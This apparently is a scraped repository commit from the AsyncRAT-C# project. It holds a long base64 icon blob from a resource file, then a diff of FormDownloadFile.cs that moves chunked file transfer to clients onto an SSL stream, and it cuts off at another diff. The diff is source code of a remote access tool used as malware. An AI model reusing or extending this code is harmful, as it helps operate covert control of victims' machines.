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
gg==
</value>
</data>
</root>

10
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormDownloadFile.cs
View File

@ -12,6 +12,7 @@ using System.Threading;
using System.IO;
using System.Net.Sockets;
using Timer = System.Threading.Timer;
using AsyncRAT_Sharp.Helper;
namespace AsyncRAT_Sharp.Forms
{
@ -55,14 +56,14 @@ namespace AsyncRAT_Sharp.Forms
{
try
{
byte[] msg = Settings.AES.Encrypt((byte[])obj);
byte[] msg = (byte[])obj;
byte[] buffersize = BitConverter.GetBytes(msg.Length);
C.ClientSocket.Poll(-1, SelectMode.SelectWrite);
Tick = new Timer(new TimerCallback(Timer3), null, 0, 1000);
C.ClientSocket.Send(buffersize);
C.ClientSslStream.Write(buffersize);
C.ClientSslStream.Flush();
int chunkSize = 50 * 1024;
byte[] chunk = new byte[chunkSize];
int SendPackage;
using (MemoryStream buffereReader = new MemoryStream(msg))
{
BinaryReader binaryReader = new BinaryReader(buffereReader);
@ -71,7 +72,8 @@ namespace AsyncRAT_Sharp.Forms
{
chunk = binaryReader.ReadBytes(chunkSize);
bytesToRead -= chunkSize;
SendPackage = C.ClientSocket.Send(chunk);
C.ClientSslStream.Write(chunk);
C.ClientSslStream.Flush();
BytesSent += chunk.Length;
} while (bytesToRead > 0);

28
AsyncRAT-C#/AsyncRAT-Sharp/Forms/FormPorts.Designer.cs generated
View File

@ -32,8 +32,6 @@
this.textPorts = new System.Windows.Forms.TextBox();
